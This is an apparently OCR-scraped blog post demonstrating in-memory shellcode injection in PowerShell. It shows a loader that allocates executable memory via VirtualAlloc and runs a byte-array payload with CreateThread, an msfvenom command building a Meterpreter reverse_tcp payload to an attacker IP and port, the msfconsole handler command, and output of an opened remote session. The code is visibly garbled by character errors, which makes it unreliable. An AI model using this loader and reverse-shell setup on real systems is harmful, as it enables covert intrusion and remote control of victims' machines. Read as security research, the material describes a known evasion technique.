Simple In-Memory Injection

$pos= '[DllImport("kernel32.d11")] 
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwpysize, uint flAllocationType, uint flProtect);[DllImport("kerne132.d11")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackpysize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$malFunc = Add-Type -memberDefinition $pos -Name 11Win32" -namespace Win32Functions -p assthru;
[Byte []];
[Byte[]] $pyld = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0xl4,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x.26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xcl,0xcf,0xd,0xl,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0xl0,0x8b,0x4a,0x3c,0x8b,0x4c,0xll,0x78,0xe3,0x48,0xl,0xdl,0x51,0x8b,0x59,0x20,0xl,0xd3,0x8b,0x49,0xl8, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0xl, 0xd6, 0x31, 0xff, 0.xac, 0xcl,0xcf,0xd,0xl,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0xl,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0xlc,0xl,0xd3,0x8b,0x4,0x8b,0xl,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0xl2,0xeb,0x8d,0x5d,0x68,0x33 ,0x32 ,0x0 ,0x.0, 0x68, 0.x77, 0x73, 0x32 ,0x5f 0x7,0xff,0xd5,x90,0xl,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xac,0x10,0x74,0x8b,0x68,0x2,0x0,0xll,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0xl0,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x61,0x0,0x0,0x0,0x6a,0x06,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x0x24,0xe9,0x71,0xff,0xff,0xff,0xl,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;
$pysize= 0x1000;
if ($pyld.Length -gt 0x1000) {$pysize = $pyld.Length};
$z = $malFunc::VirtualAlloc(0,$pysize,0x3000,0x40);
for ($i=0;$i -le ($pyld.Length-1);$i++) {$malFunc::memset([IntPtr]($z.Tolnt32()+$i), $pyld
[$i], 1)} ;
$malFunc::CreateThread(0,0,$z,0,0,0);for (;;) { Start-sleep 60 };
parrot@Userman:-$msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.178.1 LPORT=4444 -f psh -o payld.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 410 bytes
Final size of psh file: 3255 bytes
Saved as: payld.ps1
parrot@Userman:-$msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.178.1; set lport 4444; set ExitOnSession false; exploit -j"
[*] Meterpreter session l opened (10.10.178.1:4444 -> 10.14.10.22:54556) 
meterpreter > whoami
Windows\Userman
  1. https://www.viva64.com/en/b/0360/ , https://raw.githubusercontent.com/revsic/CodeInjection/master/MemoryScanInjector.cpp
  2. https://www.deepinstinct.com/2019/09/15/malware-evasion-techniques-part-1-process-injection-and-manipulation/
  3. https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
  4. https://i.blackhat.com/USA-19/Thursday/us-19-Kotler-Process-Injection-Techniques-Gotta-Catch-Them-All-wp.pdf
  5. https://www.coalfire.com/the-coalfire-blog/may-2018/powershell-in-memory-injection-using-certutil-exe, https://github.com/stephenfewer/ReflectiveDLLInjection
  6. https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1

--

--

--

Prakash Ashok, Security Analyst at WeSecureApp, CTF player, Blockchain developer and Security Researcher.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Setting up a Production Ready Java Web App in less than 10 minutes!

The Andela Boot camp Experience: Day 2

This week in DevOps #33 — GitOps Issue #15

AR(Instant Placement) — A TCW project Case Study — TheCodeWork

Top Advantages and Disadvantages Of Kubernetes

How to improve the DDDness of your application.

3 Reasons You Might Want To Switch To a NoSQL Database

What does a DevOps engineer do???Role of a DevOps Professional

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
just_a_noob

just_a_noob

Prakash Ashok, Security Analyst at WeSecureApp, CTF player, Blockchain developer and Security Researcher.

More from Medium

Using Java Deserialization to exploit log4shell — LogForge, HTB

Apache Log4j Shell POC exploits

Why do Deserialization Vulnerabilities occur?

Proof of concept: zero-day- log4j RCE